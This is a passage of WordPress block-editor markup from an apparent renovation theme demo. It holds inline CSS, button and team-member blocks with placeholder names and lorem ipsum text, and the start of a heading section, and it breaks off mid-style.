Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"a982759b-8eb1-4278-8e6d-30ac05e73771\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec6e65f8-ff22-4968-af3a-cce4cc21b8a3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f25b9c21-2e8e-4873-9145-526e0c982809\"} -->\n<style type=\"text/css\"> .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f25b9c21-2e8e-4873-9145-526e0c982809 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"68b54430-940b-4d40-99b2-a93a58a6a678\"} -->\n<style type=\"text/css\"> .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-68b54430-940b-4d40-99b2-a93a58a6a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"627304db-e6fd-4a57-93f7-a54b4780da61\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 